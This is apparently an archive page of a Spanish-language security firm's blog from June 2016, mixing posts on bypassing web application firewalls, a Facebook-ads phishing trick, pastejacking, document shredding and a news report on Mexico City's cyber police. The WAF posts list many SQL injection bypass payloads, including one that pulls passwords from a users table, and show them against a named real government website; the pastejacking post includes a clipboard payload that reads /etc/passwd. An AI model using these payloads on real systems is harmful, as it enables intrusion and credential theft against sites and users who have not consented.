Month: June 2016

¿CÓMO HACKEAR FÁCILMENTE FIREWALL DE APLICACIÓN WEB (WAF)? PARTE 2

Posted on

En un artículo anterior hemos cubierto algunas técnicas de hackeo de firewalls de aplicación web. En este artículo vamos a cubrir el resto de las técnicas con ayuda de expertos de pruebas de penetración.

DOBLE CODIFICACIÓN PARA HACKEAR UN FIREWALL DE APLICACIONES WEB

Como hemos comentado antes, hay muchas aplicaciones que juegan un papel para pasar su solicitud desde tu navegador a la base de datos. Este truco se basa en explotar este comportamiento cuando nuestra solicitud se decodifica dos veces antes de que llegue a la base de datos. Como sabemos que el servidor web hace la descodificación básica de URL, ya que pasa los parámetros de solicitud a la aplicación web. Pero ¿qué si el desarrollador nuevamente hizo la decodificación? Bueno, sí hay muchas ocasiones en que el desarrollador decodifica la solicitud antes de usarla. De aquí surge una vulnerabilidad. A veces podemos utilizar este comportamiento para hackear un firewall acuerdo a expertos de seguridad perimetral.

HACKEAR LOS FILTROS QUE DISTINGUEN MAYÚSCULAS Y MINÚSCULAS

Como comentaron los investigadores de soluciones de seguridad de la informaciónanteriormente sobre el conjunto de reglas definidas por el firewall de aplicaciones web, si usted sabe algunos conceptos básicos de Regex entonces no hay necesidad de decir que la diferencia entre ellos:

/union.*select/
and
/union.*select/i

Bueno, si usted no sabe, entonces deja que te expliquemos. El primero de ellos distingue mayúsculas de minúsculas y el segundo no, mientras haces que Regex maneje este error que puede pasar a veces. Esto da origen a este tipo de ataques según curso de pruebas de penetración.

CONTAMINACIÓN DE PARÁMETROS/ HTTP PARAMETER POLLUTION HTTP

Puede ser que muchos de ustedes han oído hablar de él, pero estoy seguro de que pocos lo hubieran utilizado alguna vez. En primer lugar que es HPP, Definición en OWASP – El suministro de múltiples parámetros HTTP con el mismo nombre podrían resultar que una aplicación interprete los valores de manera imprevista. Consultores de soluciones de seguridad de la información comentan que mediante la explotación de estos efectos, un atacante puede ser capaz de pasar por alto la validación de entrada, provocar errores de aplicación o modificar los valores de variables internas. Como HTTP Parameter Pollution (HPP) afecta a un componente básico de todas las tecnologías web y existen ataques contra seguridad perimetral.

Los ataques HPP consisten en inyectar delimitadores de texto en una consulta codificada en otros parámetros existentes. Si soluciones de seguridad de la información no limpian adecuadamente el ingreso del usuario, un usuario malicioso puede comprometer la lógica de la aplicación para realizar ataques, ya sea del lado del cliente o del lado del servidor. Una de las consecuencias de los ataques de HPP es que el atacante potencialmente pueden ignorar los parámetros HTTP no modificables existentes para modificar el comportamiento de seguridad perimetral, los controles de validación de entrada de derivación, y el acceso y posiblemente explotar las variables que pueden estar fuera del alcance directo.

Los ataques HPP se puede definir como la posibilidad de anular o añadir parámetros HTTP GET / POST mediante la inyección de delimitadores texto en una solicitud. Acuerdo a experto depruebas de penetración, esto afecta a base de todas las tecnologías web existentes tanto, los ataques del lado del servidor y del lado del cliente.

Explotando las vulnerabilidades de HPP es posible:

  • Invalidar parámetros HTTP fijos existentes.
  • Modificar los comportamientos de las aplicaciones.
  • Acceso y, potencialmente explotar, variables incontrolables.
  • Omitir la validación de la entrada, puestos de control y reglas de la WAF.

Aquí es una tabla que muestra el comportamiento por defecto de estas aplicaciones con HPP.

hack WAF

HTTP PARÁMETRO FRAGMENTACIÓN/ HTTP PARAMETER FRAGMENTATION (HPF)

La idea de utilizar HTTP Parameter Fragmentation (HPF) cuando se llama a una aplicación web con el fin de hackear los filtros de seguridad no es una nueva. De acuerdo con curso de pruebas de penetración, este método le permite a uno para omitir con éxito filtros utilizados en la mayoría de los firewalls de aplicaciones web modernas. Así que, ¿cuál es la esencia de esta técnica? Consideremos ejemplos de la explotación de inyección SQL.

A menudo es necesario tener dos o más parámetros de usuario en un código SQL, por ejemplo:

<br />Query(“select * from table where a=”.$_REQUEST [‘a’].” and b>”.$_REQUEST [‘b’]);<br />Query(“select * from table where a=”.$_REQUEST [‘a’].” and b<“.$_REQUEST [‘b’].” limit “.$_REQUEST[‘c’]);<br />etc.<br />

En la fase de verificación de los valores de los parámetros recibidos del usuario en el nivel de aplicación web, la aplicación es capaz de operar con solo variables del servidor web y WAF es capaz de operar directamente con los datos de HTTP. Sin embargo, independientemente del método de acceso a los datos, se trata de utilizar ciertas expresiones regulares (regexps) para cada parámetro por separado.

<br />preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘a’])br
</>preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘b’])br
</>preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘c’])br />…br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘a’])br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘b’])br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘c’])br />…br />

Por lo tanto, si uno se divide la lógica del código SQL entre varios parámetros que entren en el código SQL y luego concatena estas piezas utilizando los comentarios, será posible hackear los filtros de soluciones de seguridad de la información:

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users

<br />Query(“select * from table where a=1 union/* and b>*/select 1,2”);<br />Query(“select * from table where a=1 union/* and b<*/select 1,pass/* limit */from users”);<br />

Dado que los comentarios se ignoran, el código de hecho es:
select * from table where a=1 union select 1,2
select * from table where a=1 union select 1,pass from users

Uno puede notar que teniendo en cuenta la vía de ataque, HPF es muy similar a la HPP (HTTP Parameter pollution), pero a diferencia de este último, la aplicación HPP tiene por objeto la explotación de la vulnerabilidad en seguridad perimetral, no en el entorno de la aplicación. Según empresa de pruebas de penetración, por supuesto, ambos métodos de ataque pueden complementar entre sí.

 

DESTRUCCIÓN DE DOCUMENTOS CONFIDENCIALES DE FORMA SEGURA

Posted on

Las piezas innecesarias de papel que se encuentren alrededor de la oficina son una molestia para cualquier empresa, ocupando un espacio valioso en la oficina y la creación de un entorno de oficina desorganizada. Sin embargo, algunas organizaciones pueden ser una tentativa de hacer destrucción de papel y hacer destrucción de documentos confidenciales. Una actitud prudente es muy sabia, ya que hay una serie de cuestiones que hay que abordar antes de eliminar un archivo de carácter sensible.

  • ¿Voy a necesitar esto de nuevo?
  • ¿Estoy haciendo una brecha de la Ley de Protección de Datos?
  • ¿Este documento ha terminado su ciclo de vida de retención?
  • ¿Este archivo contiene información confidencial?

Con estas preguntas en mente, es probable que tengas cuidado al hacer destrucción de papel. Sin embargo, existe una forma de garantizar la paz de la mente cuando se trata de hacer destrucción de documentos confidenciales – mediante la planificación de los siguientes criterios.

destruccic3b3n-de-documentos

1.) CICLO DE RETENCIÓN

El factor más importante a considerar antes de hacer destrucción de papel o archivo es la longitud de su ciclo de retención; legalmente una empresa es responsable de los planes de retención de todos sus documentos. Diferentes documentos tienen diferentes ciclos de retención. Por ejemplo, los extractos de cuenta deben mantenerse durante 2 años, mientras que tendrá que ser mantenidos de forma permanente un formulario de solicitud de los empleados.

Si usted está preocupado de que su negocio no tiene la experiencia o el tiempo para realizar un procedimiento de auditoría para determinar sus ciclos de retención de documentos y luego considerar el uso de una empresa de gestión de registros. Un servicio de gestión de registros profesional será capaz de auditar plenamente todos sus documentos, asegurándose de que su empresa se mantiene dentro de los parámetros legales de destrucción de documentos confidenciales.

2.) LA LEY DE PROTECCIÓN DE DATOS

Antes de hacer destrucción de documentos confidenciales de la empresa debe considerar los términos de la Ley de Protección de Datos , de lo contrario se podría correr el riesgo frente a una multa de hasta 500.000 pesos o incluso una pena de prisión según expertos de protección de datos personales en México. La violación de la Ley de Protección de Datos podría dañar seriamente la reputación de su empresa.

En 2014, el Grupo EVBA violó la Ley de Protección de Datos mediante el envío de un archivador a una instalación de reciclaje para ser destruidos. El archivero contenía detalles personales de los empleados. De acuerdo con un informe de prensa, Grupo EVBA enfrentó a la “humillación y publicidad perjudicial”. Como consecuencia, la empresa tuvo que firmar un acuerdo formal con el IFAI para asegurar que se tomen medidas para evitar que otra vez ocurra el incidente mencionen expertos de protección de datos personales en México

3.) TRITURACIÓN DEL CICLO DE VIDA

El seguimiento de la edad de registros es una parte esencial de gestión del ciclo de vida de registros. Los documentos sólo se deben tirar si exceden el período recomendado indicado en un plan de retención.

La destrucción de papel segura es la mejor manera de hacer destrucción de documentos confidenciales que contengan información sensible. Nunca – Jamás – simplemente puedes dejar documentos confidenciales de la empresa en una papelera. No sólo la trituración es la mejor manera de asegurar que información confidencial no se pierde, es también es mejor para el medio ambiente que simplemente tirar sus documentos en una cesta de papel de desecho en general.

Si usted tiene una gran cantidad de papeles confidenciales que necesita tener triturados entonces vale la pena pensar en la externalización de su destrucción de documentos confidenciales a una empresa de destrucción de papel.

4.) LA ELIMINACIÓN DIGITAL

Parte de la información más confidencial de su empresa es probable que se almacene digitalmente. Por desgracia, en estos días no se puede simplemente confiar en el botón “Eliminar” para hacer efectiva el trabajo. Limpiando el disco duro de todos los datos o el uso de un programa que sobrescribe los datos de modo que no se puedan recuperar son opciones a considerar recomiendan expertos de protección de datos personales en México. Sin embargo, los dos métodos anteriores están en riesgo de error humano y la destrucción de los archivos incorrectos podría tener implicaciones perturbadoras.

Si usted está preocupado por la destrucción de los registros electrónicos de conformidad con los trámites legales continuación, busque en la externalización de sus servicios de copia de seguridad y almacenamiento de datos. Empresas de gestión de registros pueden hacer destrucción de papel , destruir los documentos electrónicos almacenados en una variedad de diferentes equipos, incluyendo: unidades USB, CD / DVD, discos duros, los rollos de película y cintas de los medios.

5.) MANTENER LOS COSTOS BAJOS

Nadie quiere pagar para deshacerse de artículos que ya no quieren, pero con las leyes de protección de datos en México eliminación efectiva más grave ahora es más importante que nunca. Mientras que algunos proveedores de almacenamiento cobran una prima para la trituración, nosotros proporcionamos servicio de destrucción de documentos confidenciales y protección de datos personales en México.

 

New exploits target hospital devices, places patients at risk

Posted on

‘Medjack 2’ describes the latest weapons in the hacker arsenal used to hijack medical devices.

¿CÓMO HACKEAR FÁCILMENTE FIREWALL DE APLICACIÓN WEB (WAF)?

Posted on

Firewall de aplicaciones web se implementa típicamente en algún tipo de proxy justo en frente de las aplicaciones web, por lo que no se ve todo el tráfico en nuestras redes. Al monitorear el tráfico antes de que llegue a la aplicación web, firewall de aplicaciones web puede analizar las solicitudes antes de pasarlas. Esto es lo que les da una ventaja sobre el IPSS. Debido a que IPSS está diseñado para interrogar a todo el tráfico de la red, no pueden analizar la capa de aplicación tan a fondo como firewall de aplicaciones web según expertos de pruebas de penetración.

Aquí hay un ejemplo de MOD security WAF

URL normal

http://bpc.gov.bd/contactus.php?id=4

Detectado por MOD Security

http://bpc.gov.bd/contactus.php?id=4′ UNION SELECT 1,2,3– –

Sin detección:
http://bpc.gov.bd/contactus.php?id=.4’/*!50000UNION*//*!50000SELECT*/1,2,3,4,5,6,7–

Ahora, antes de continuar nos gustaría compartir un hecho muy interesante sobre este sitio, este sitio es vulnerable desde hace mucho tiempo según diferentes expertos de seguridad perimetral. La última vez los hackers lo atacaron y se tomar el control del sitio. Esta vez, cuando comenzamos a atacar hemos encontrado que algo ha cambiado. El único cambio que hizo, es que ahora están utilizando dos soluciones de seguridad de la información. Es como si el administrador no quiere perder el tiempo en cambiar el código de la aplicación y eliminar la vulnerabilidad. Recuerde que firewall de aplicaciones web es una buena seguridad perimetral, pero no se puede simplemente dejar la aplicación vulnerable sin hacer pruebas de penetración y completamente depender de firewall de aplicaciones web para la seguridad.

DETECTAR EL FIREWALL DE APLICACIONES WEB

Según investigadores de soluciones de seguridad de la información, hay muchas herramientas y secuencias de comandos que pueden detectar la presencia de huellas de WAF sobre una aplicación, que incluya pero no se limite

  • NMAP
  • WAFw00f
  • Verificación de los encabezados de respuestas
  • Verificación de la respuesta
  • etc.

DETECTANDO FIREWALL DE LA APLICACIÓN WEB USANDO NMAP

nmap -p80 –script http-Web Application Firewall-detect <host>

FINGERPRINTING WAF USANDO NMAP

nmap -p80 –script http-WAF-fingerprint <host>

FINGERPRINTING WAF USANDO WAFW00F

WAFw00f.py <url> 

Una vez que conoces el firewall de aplicaciones web con el que estas tratando, puedes buscar formas de hackear seguridad perimetral.

TÉCNICAS UTILIZADAS PARA HACKEAR SEGURIDAD PERIMETRAL

Con ayuda de expertos de pruebas de penetración, vamos a aprender varias técnicas de hackear un firewall de aplicaciones web y una vez que hayamos terminado, vamos a acoplarlos y mezclarlos las técnicas entre sí para cortafuegos avanzados de aplicaciones web.

DIFERENTES TIPOS DE CODIFICACIÓN

Hay muchos tipos de codificación, algunos de ellos son respaldaos por el servidor de aplicaciones, algunos de ellos cuentan con el apoyo por la aplicación web y algunos otros son soportados por el servidor de base de datos. Cuando enviamos una solicitud esta pasa por muchas capas y diferentes tipos de aplicaciones antes de nuestra solicitud llegas a la base de datos, por lo que muchas veces somos capaces de utilizar diferentes tipos de codificaciones y doble codificación que no son compatibles con el servidor de base de datos, pero las otras aplicaciones en medio, pueden decodificar nuestra solicitud y pasarla al servidor de base de datos. Según expertos de pruebas de penetración, a veces tomar ventaja de este tipo de comportamiento nos ayuda a hackear un firewall de aplicaciones web.

Vamos a dar un ejemplo básico, hay un buen servidor de seguridad implementado en una aplicación. La aplicación ha obtenido una solicitud de parámetros que primero se codifican como Base64 y luego Rot13. Cuando se inyecta dicha solicitud nuestra solicitud será codificada y pasa firewall de aplicaciones web, la próxima cuando se llega a la aplicación se decodifica y luego se envía al servidor de base de datos. Aquí pasamos el firewall de aplicaciones web, ya que nuestra solicitud fue codificada y decodificada antes de que pasará a la base de datos.

De esta manera, hay muchos tipos diferentes de codificaciones que podemos utilizar para hackear un firewall de aplicaciones web por ejemplo, URL Encoding, Hexing, Binary, Unicode, etc. En primer lugar vamos a empezar con hackeo de las reglas de condición de pruebas que muchos firewalls de aplicaciones web están bloqueados estos días como:
Las verdaderos condiciones de bloqueos

1 or 1=1
1′ or ”=’
1″ or “”=”
1′ or true#
1″ or true#
1 or true#
etc.

Ahora vamos a mezclar un poco de sentido común y codificaciones para hackear este tipo de filtros:

or ‘1
|| ‘1
null’ || ‘a’=_binary’a
1′ || ‘a’=x’61
1′ && ‘0’=x’30
1′ %26%26 %270%27%3dx’30
2′ && 0.e1=_binary”0
1 or 1.e1=0b1010
‘ || 1 like 1
‘-‘
“-“
‘ || 2 not like 1
110 or x’30’=48
‘1’!=20
1 or 20!=’1′
2 and 2>0
3 || 0<1
12 || 0b1010<0b1011
0b11 || 0b1010x’30’
1 or 0b1
2121/**/||21
111′ or _binary’1
1 or 2121
1′ or 12 rlike ‘1

Según consultores de soluciones de seguridad de la información, usando las técnicas anteriores y mezclándolas hasta que puede generar miles de diferente payloads y técnicas. Aquí hemos utilizado la codificación Binary, Hex, así como algunas palabras clave para hackear. En realidad firewall de aplicación web detecta cualquier cosa maliciosa utilizando el conjunto de reglas definidas. Por lo que necesitamos generar algo diferente para confundirlos.

Si no entendieron anteriormente las técnicas aquí hay una explicación básica del uso de Binary, Hex, Like y Rlike en SQL
Binary
Select 1 from dual where 0b1010=10
Hex Type 1
Select 1 from dual where ‘0’=x’30’
Hex Type 2
Select 1 from dual where 0x30=’0′
Like statement
Select 1 from dual where 1 like 1
Rlike Statement
Select 1 from dual where 12 rlike 1
|| (OR)
Select 1 from dual where 1||1
&& (And)
Select 1 from dual where 1&&1

Como sabemos SQL no soporta la codificación URL, pero el servidor y aplicaciones web sí soportan. Así también podemos utilizar la codificación de URL para hackear firewall de aplicaciones web menciona experto de soluciones de seguridad de la información. Lo primero es entender cómo funciona. Algunas veces cuando un firewall basado en la red esta implementado o firewall de aplicaciones esto podría suceder que el firewall de aplicaciones web no está decodificando nuestra solicitud mientras que está comprando con el conjunto de reglas. Cuando nuestra solicitud llega al servidor o la aplicación, entonces se descodifica, y luego se pasa al servidor de base de datos. De esta manera la codificación de URL también nos ayuda a hackear firewall de aplicaciones web muchas veces.

Los siguientes son algunos ejemplos de URL codificada para hackear WAF:

%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74

Usted no está obligado a utilizar la codificación URL sólo con unión select también se puedes codificar otras palabras clave u operadores.

Veamos algunos otros usos de codificaciones, aquí se asume un firewall de aplicaciones web se ha bloqueado o filtrada uso de ‘0x’ para filtrar uso de hex en tu inyección y comillas simples o dobles no están permitidos. Incluso a veces los firewalls de aplicaciones web usan para descodificar Hex de solicitudes y comprobar si hay contenido malicioso. Podemos tratar las siguientes formas de superar la situación.

Normal Hex (Blocked)
select 0x313131
Hexed Bypass Version
select x’313131′;
Binary Bypass
select 0b011110100110010101101110;
Bypass using functions
select unhex(x’333133313331′);
 

Y así podemos seguir adelante para hackear el firewall de aplicaciones web de muchas otras maneras. Ahora esto todo es la codificación básica y su papel en hackear el firewall de aplicaciones web. Según experto sde pruebas de penetración, algunas veces también puede utilizar la codificación UTF-8 URL para hackear firewall de aplicaciones web, lo cual también se puede aprender en el curso de seguridad perimetral.

En siguiente artículo vamos a cubrir más sobre seguridad de aplicaciones web y como hackear firewall de aplicaciones web con ayuda de expertos de soluciones de seguridad de la información.

ASÍ SE HACKEA USUARIOS DE FACEBOOK EXPLOTANDO SISTEMA DE PUBLICIDAD DE FACEBOOK ADS ?

Posted on Updated on

facebook ads hack

En este artículo vamos a mostrar cómo podemos hacer un ataque cibernético sobre cuentas de Facebook con ayuda de profesores . Explotando una vulnerabilidad en sistema de anuncios de Facebook podemos hacer ataque de phishing acuerdo a profesor de curso de seguridad web. La tasa de conversión de un ataque de phishing es muy alta. Y tú puedes hackear fácilmente llegar objetivo. En este artículo vamos a mostrar cómo hacer este tipo de ataque. Nosotros utilizaremos los anuncios locales y victimas locales. Usaremos nuestro código postal, edad, y lo configuraremos por lo que los anuncios sólo se presentarían a la gente conectada la página de Facebook.

Vamos a preparar y ejecutar un anuncio en Facebook, y la URL de destino es espn.l1dh.com ohttp://goo.gl/UssPDm y nosotros fijamos la URL visible a http://www.cnn.com o ctvnews.ca.

anunciofacebook

El dominio de anuncio se ve como http://www.cnn.com o ctvnews.ca que es una organización de noticias de buena reputación. Por lo tanto muy poca gente va a dudar antes de hacer clic en el anuncio.

anunciofacebook

anunciofacebook

Por lo tanto notarás que esto se parece muchísimo a ESPN, no como a CTV/CNN News en absoluto. Desplazándose al final de la página vemos los anuncios inevitables para los suplementos.

anuncios facebook hack

La página web se ve como ESPN y el jugador está avalando este suplemento. En la parte inferior de la página se puede ver la “evidencia social” de la gente que recomienda el producto. Esto le dará a la gente más confianza para permanecer en la página menciona el profesor de curso de seguridad web.

Vamos a hacer una rápida búsqueda en imagen inversa para ver si se trata de personas reales. Charles Barrott es el objetivo de nuestra búsqueda, en este caso:

anuncios facebook hack

Esto invertirá búsqueda en Google de esa imagen exacta. Aquí están los resultados y foto parece de Sam Muirhead, un director de cine. Entonces hemos creado cuentas falsas para recomendar la página.

anuncios facebook hack

Esto muestra claramente que los hackers han descubierto la manera de jugar con el sistema de Facebook con el fin de publicar anuncios que parecen que llevan un solo lugar (ctvnews.ca) y en última instancia conducir a un lugar muy diferente. No sólo eso, sino que se utilizan repetidamente los nombres comerciales, los términos y la información falsa para vender el producto. Según los expertos de curso de seguridad web, esto viola una serie de políticas de publicidad de Facebook. También se puede poner un malware de ransomware o una página de spear phishing.

¿CÓMO HACER UN ANÁLISIS DE ESTE TIPO DE ATAQUE?

Copiar la URL del anuncio. En lugar de hacer clic en el enlace, haga clic derecho y copiar en un editor de texto.

anuncios facebook hack

Es un gran URL desordenado, y si ves todos esos pequeños% ‘s esto le está diciendo que la URL está codificado. Según los expertos de curso de seguridad web, usted puede encontrar fácilmente un URL decoder en línea que puedes usar para saber URL real y veras lo siguiente:

https://www.facebook.com/a.php?u=http://goo.gl/UssPDm&

El primer parte es el controlador de publicidad de Facebook, y la parte en negrita es la dirección URL de destino donde una víctima llegara después de hacer clic. Nosotros hemos cortado la carácter “&” de manera que sólo tenemos URL acortada de Google. Esto nos lleva a la siguiente parte de nuestra investigación.

ANALIZANDO URL’S ACORTADA DE GOOGLE

Acortador de URL de Google funciona como cualquier otro servicio de acortamiento como bit.ly. Usted entra su URL y te devuelve un pequeño URL. Lo bueno del acortador de URL de Google es que proporciona analíticos para usted de modo que usted puede ver cómo se accediendo a un URL acortado y cuántas veces.

ENTONCES, ¿CÓMO ENCONTRAR ESTOS ANALÍTICOS MARAVILLOSOS?

Sólo tiene que añadir .info hasta el final de URL acortada y se te llevará a una página que tiene los datos:

https://goo.gl/UssPDm.info

anuncios facebook hack

Por lo tanto podemos ver que había 26, 812 clics a través de esta URL y si se pasa sobre el gráfico de anillos veremos que existían confirmados 11.246 de ellos llegaron de Facebook. Esa es una gran cantidad de clics. Los clics “Desconocido” podrían ser un caso de navegadores que no pasan a la información de cabecera HTTP . Lo que podemos ver en el gráfico de la actividad es que la campaña sólo se postuló para un período relativamente corto de tiempo antes de detenerse. En defensa de Facebook, esto puede significar que detectaron este fraude o alguien reporto el anuncio. También podría significar que el estafador hizo suficiente dinero y decidió parar la campaña y hackear los usuarios suficientes.

También vemos que la URL de destino (que ahora está muerto) es:

http://dftrack6.com/?i0g51dkl&s1=sc_hgould_ca_ll

Entonces no tenemos pruebas suficientes para demostrar que tenemos una página de destino fraudulenta, pero si usted busca sobre el dominio dftrack6.com, verá rápidamente que parece sospechoso.

El punto principal aquí ha sido sin embargo demostrado: los hackers pueden crear anuncios que parecen apuntar a sitios legítimos, y luego podrían llevar miles de clics a sus páginas de destino y ejecutar código malicioso menciona el profesor del curso de seguridad web.

Fuente:http://noticiasseguridad.com/importantes/asi-se-hackea-usuarios-de-facebook-explotando-sistema-de-publicidad-de-facebook-ads/

¿CÓMO HACER UN ATAQUE PASTEJACKING Y TOMAR EL CONTROL DE LA MÁQUINA DE VÍCTIMA?

Posted on

pastejacking

Ha sido posible por un largo tiempo para que los desarrolladores usar CSS para añadir contenido malicioso en el portapapeles sin conocimiento del usuario y por lo tanto engañarlos para que ejecute comandos de terminales no deseados. Este tipo de ataque se conoce como clipboard hijacking. Un investigador de seguridad de página web, publicó una nueva versión de este ataque, que sólo utiliza JavaScript como medio de ataque, no CSS. JavaScript hace que este ataque más difícil de detectar y más difícil de detener.

JavaScript es mucho más potente y versátil en comparación con CSS, y se nota inmediatamente explica profesor de curso de seguridad informática. Mientras que en el CSS exploit el usuario tenía que copiar y pegar todo el texto malicioso, con JavaScript cosas son mucho más complicadas.

Los usuarios ni siquiera tienen que seleccionar todo el texto malicioso. Un carácter es suficiente. En teoría, un atacante podría añadir su código malicioso Pastejacking JavaScript para toda la página, y cuando tú pegas cualquier cosa dentro de la consola, ellos podrían ejecutar comandos a escondidas a tus espaldas explica profesor de curso de seguridad informática. El atacante puede ejecutar su código malicioso, limpiar la consola, y luego añadir el código del usuario copiado, haciéndoles creer que no pasó nada.

Según investigador de seguridad de página web, el ataque puede ser mortal si se combina con las páginas de soporte técnico o correos electrónicos de phishing. Los usuarios pueden pensar que están copiando el texto inocente en su consola, pero de hecho, se están ejecutando código malicioso. Debido a que los comandos de terminal se ejecutan automáticamente, el usuario ni siquiera tiene presionar la tecla Enter para ejecutar el código malicioso, CTRL + V es suficiente.

Por ejemplo, alguien en busca de consejos sobre los comandos de cmd.exe podría copiar y pegar el código que encontró en línea en los artículos de tutoriales, pero la persona maliciosa detrás de ese sitio en particular se podría anexar decenas de líneas de código malicioso que se descargan malwares desde una fuente y se instalan en línea en su ordenador. Todo esto puede suceder en silencio, sin que el usuario se percate de nada.

Acuerdo con el ternario del curso de seguridad informática ataques similares han sido posibles a través de HTML / CSS. Lo que es diferente al respecto es que el texto puede ser copiado después de un evento, se puede copiar en un contador de tiempo corto después de un evento, y es más fácil de copiar en caracteres hexadecimales en el portapapeles, cual puede ser utilizado para explotar VIM, como se mostrara a continuación.

DEMOSTRACIÓN

He aquí una demostración de un sitio web que atrae a un usuario para copiar un comando de aspecto inocente. El sitio es de demostración credo por investigador de seguridad de página web.

https://security.love/Pastejacking

Si un usuario intenta copiar el texto con atajos de teclado, es decir, Ctrl + C o command+C, un temporizador de 800 ms se establece que sustituye directamente el valor del portapapeles del usuario con código malicioso.

echo “not evil” Se reemplazará con echo “evil”\n

Tenga en cuenta el carácter de nueva línea se añade al final de la línea. Cuando un usuario va a pegar el comando de eco en su terminal, “evil” se aparecera  automáticamente en la pantalla sin dar al usuario la oportunidad de revisar el comando antes de ejecutar. Payloads más sofisticadas que se esconden también se pueden utilizar.

touch ~/.evilclearecho “not evil”

Este comando creará un archivo “evil” en su directorio personal y limpiara  la terminal de salida. La víctima parece tener el comando que pretendía copiar en el terminal.

IMPACTO

Este método se puede combinar con un ataque de phishing para atraer a los usuarios a ejecutar comandos aparentemente inocentes explica investigador de seguridad de página web. El código malicioso se anulará el código inocente, y el atacante puede obtener la ejecución remota de código en la máquina del usuario si el usuario pega el contenido en el terminal.

¿CÓMO PROTEGERTE A TI MISMO?

Esto no es tan sencillo. Una solución recomendada por curso de seguridad informática es, verificar el contenido del portapapeles antes de pegarlo en una terminal, pero tenga cuidado de donde se verifican estos comandos. Por ejemplo si se pegan en vim, macros vim se puede utilizar de aprovecharte. Un ejemplo de esto se puede ver en esta demostración más abajo.

copyTextToClipboard(‘echo “evil”\n \x1b:!cat /etc/passwd\n’);

Una solución en todo esto puede observarse a continuación

Dentro de vim para pegar portapapeles sin interpretar como un comando vim

Si está ejecutando iTerm, estaría advertido si el comando termina con un salto de línea como se ve aquí:

pastejacking

Por supuesto, no hace falta decir, tomar nota de la fuente que se está pegando a partir, y tener precaución adicional si se va a pegar de fuentes cuestionables.

 

Sin anzuelo. Policía cibernética no puede cazar bajacalzones

Posted on

En la CDMX hay más de 3 mil denuncias por ciberdelitos como acoso y pornografía, pero las autoridades no tienen la facultad para cerrar sitios que suben materiales, como lo comprobó un colaborador de EL UNIVERSAL al iniciar una denuncia.
shark2-02_32509813

La Policía de Ciberdelincuencia Preventiva de la Ciudad de México, creada para vigilar y castigar los delitos cometidos en la red, no tiene la capacidad de cerrar sitios en internet que contengan videos tomados por debajo de las faldas de mujeres en lugares públicos sin su consentimiento, o que registren el momento en el que se les agrede al bajar su ropa interior al ir caminando por la calle, como sucedió con la periodista Andrea Noel en marzo pasado.

Esta es la respuesta que da a EL UNIVERSAL la institución que depende de la Secretaría de Seguridad Pública capitalina, en seguimiento a la nota publicada por este diario el pasado 30 de mayo, advirtiendo sobre la proliferación de clubes bajacalzones en la CDMX.

Francisco González, encargado de la Unidad de Denuncias de la Policía Cibernética de la CDMX, dice a este diario que la dependencia está imposibilitada para actuar contra sitios que contengan sharking (ataque tiburón: bajar la ropa interior de las mujeres) o upskirt (grabar por debajo de sus faldas sin su consentimiento).

“Lo que hacemos es que, luego de recibir material y recopilar denuncias, les enviamos un correo (si aparece en el sitio web) con la información que juntamos para recomendarles que eliminen dicho material”, dice González.

Explica que además debe existir un número vasto de denuncias para que proceda la recomendación, y que en caso de ser testigo de uno de estos abusos, se acuda a un Ministerio Público a presentar una denuncia.

“Necesitamos que sean varias denuncias para que tengan peso y se pueda hacer algo. Como tal, nosotros no podemos cerrar un sitio, pero sí hacer la recomendación. Además, este sitio tiene que tener antecedentes”, dijo.

Según datos de la propia dependencia, hasta este año se han recibido más de 3 mil denuncias, en su mayoría por acoso, fraudes, pornografía infantil, robo de información, venta de armas, drogas y animales exóticos. Sin embargo, ni una sola por sitios voyeur.

Octavio Campos Ortiz, ex titular de Comunicación Social de la Secretaría de Seguridad Pública de la CDMX, confirmó a EL UNIVERSAL que “no existen denuncias por este tema específico [sharking]”.

Como se publicó el 30 de mayo, los clubes bajacalzones, es decir, de personas que se dedican a abusar de mujeres en las calles para levantar sus faldas y bajar sus calzoncillos para luego subir el video a sitios pornográficos en internet, están al alza.

Una de las víctimas más notorias es la periodista estadounidense Andrea Noel, quien en entrevista confirmó la posibilidad de que el video de su ataque circule en sitios pornográficos.

En foros públicos como VoyeurAzteca se comparten fotografías y videos tomados por debajo de la falda de niñas y mujeres usuarias del Metro de la Ciudad de México, en vestidores, baños y avenidas, sin su consentimiento.

Quien escribe este reportaje intentó levantar una denuncia en contra de este sitio web y de otros que fueron detectados con cientos de materiales de este tipo.

La denuncia: ¿misión imposible?

El gobierno mexicano creó una unidad especializada en delitos cibernéticos en octubre de 2015, pero sólo sirve como “orientación”, según declaraciones de funcionarios de dicha dependencia luego de dos llamadas de este diario para levantar una denuncia.

La querella se inicia con una llamada al número (55) 5242-5068, perteneciente a la Policía Cibernética de la Ciudad de México. Se pidió levantar una denuncia contra el sitio denominado voyeurazteca.com por contenido ilegal, como grabaciones sin consentimiento de mujeres por debajo de sus faldas, además de contenidos de pornografía infantil, ambos delitos penados por la ley.

En el primer intento, el funcionario pide nombre, domicilio, edad y correo electrónico del denunciante. Luego un relato sobre la denuncia, y al final solicita enviar un mail con “la evidencia” recopilada a la direcciónpolicia.cibernetica@ssp.df.gob.mx.

Durante la segunda llamada se solicitan de igual manera los datos personales, un relato, y al final que el denunciante acuda a la oficina del Ministerio Público más próxima “con todas las evidencias” para levantar la denuncia.

“Nosotros sólo lo orientamos, no tomamos denuncias. Acuda al MP llevando toda la evidencia de esto que me está diciendo y el MP le pedirá a la Policía Cibernética que dé seguimiento”, explica el funcionario.

